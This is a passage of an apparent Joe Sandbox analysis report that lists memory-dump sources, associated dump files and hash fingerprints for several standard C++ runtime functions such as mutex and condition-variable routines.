                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                • String ID: t#
                                                                                                                                                                • API String ID: 531285432-134853180
                                                                                                                                                                • Opcode ID: f14ecfc5cb7b2071e51e87feb4e27312ecf42190ebb9eb71a10492c7e322bb65
                                                                                                                                                                • Instruction ID: 4ac695f80ba3c6d91ef38fe11f1178d98002a680522e5bacb526910de9a33bf0
                                                                                                                                                                • Opcode Fuzzy Hash: f14ecfc5cb7b2071e51e87feb4e27312ecf42190ebb9eb71a10492c7e322bb65
                                                                                                                                                                • Instruction Fuzzy Hash: 7621ED75A00119AFEF00EFA4D885DFEBBB9EF48710F104065F501A7252DB749D419BA1
                                                                                                                                                                APIs
                                                                                                                                                                • __Mtx_destroy_in_situ.LIBCPMT ref: 000A3B93
                                                                                                                                                                • __Cnd_destroy_in_situ.LIBCPMT ref: 000A3B99
                                                                                                                                                                • __Mtx_destroy_in_situ.LIBCPMT ref: 000A3BA2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                                                                                                                                                                • String ID: t#
                                                                                                                                                                • API String ID: 3308344742-134853180
                                                                                                                                                                • Opcode ID: f4fedfb8456d8d3c68d720c6b8f6c32748a8f08f5ba0c7ebcabee580741460cb
                                                                                                                                                                • Instruction ID: dd0aa13f243f6e8effa0b67bee86783eea8508650d4c0ba4746faabce4a47777
                                                                                                                                                                • Opcode Fuzzy Hash: f4fedfb8456d8d3c68d720c6b8f6c32748a8f08f5ba0c7ebcabee580741460cb
                                                                                                                                                                • Instruction Fuzzy Hash: 4551D571600B049FDB24DF68C885BAAB7E5EF06724F148A6DF55AC7791DB38A900CB90
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _xtime_get$Xtime_diff_to_millis2
                                                                                                                                                                • String ID: t#
                                                                                                                                                                • API String ID: 2858396081-134853180
                                                                                                                                                                • Opcode ID: 6b045f32e72ec1fa83ff8042526cdc1d70a6180f657f0cad48d4c9bd6473c8fe
                                                                                                                                                                • Instruction ID: ababa16e37e27a3415c424ea0b9d2464751c46908ef8f3d31166d3793f4b2a84
                                                                                                                                                                • Opcode Fuzzy Hash: 6b045f32e72ec1fa83ff8042526cdc1d70a6180f657f0cad48d4c9bd6473c8fe
                                                                                                                                                                • Instruction Fuzzy Hash: 02513D71900A06CFEF60DF24C595DEE77E4EF04711B2589AAE806AB256D730FD81CBA4
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                • String ID: t#
                                                                                                                                                                • API String ID: 32384418-134853180
                                                                                                                                                                • Opcode ID: 6fd2132af8f5f2f18e1d4250251eec6d706f839ea2db00f5b0d14fa55afa5fd0
                                                                                                                                                                • Instruction ID: 26170570f26b222bd6704c22f468c3d4669c9bd3cf6d106bf8f377ba93420138
                                                                                                                                                                • Opcode Fuzzy Hash: 6fd2132af8f5f2f18e1d4250251eec6d706f839ea2db00f5b0d14fa55afa5fd0
                                                                                                                                                                • Instruction Fuzzy Hash: D4411A72E04704ABEB109B99DD05FDBB7E8EF56720F00417AF805A7652EB74AA04C7A1
                                                                                                                                                                APIs
                                                                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 000A2846
                                                                                                                                                                • ___std_exception_destroy.LIBVCRUNTIME ref: 000A28E0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
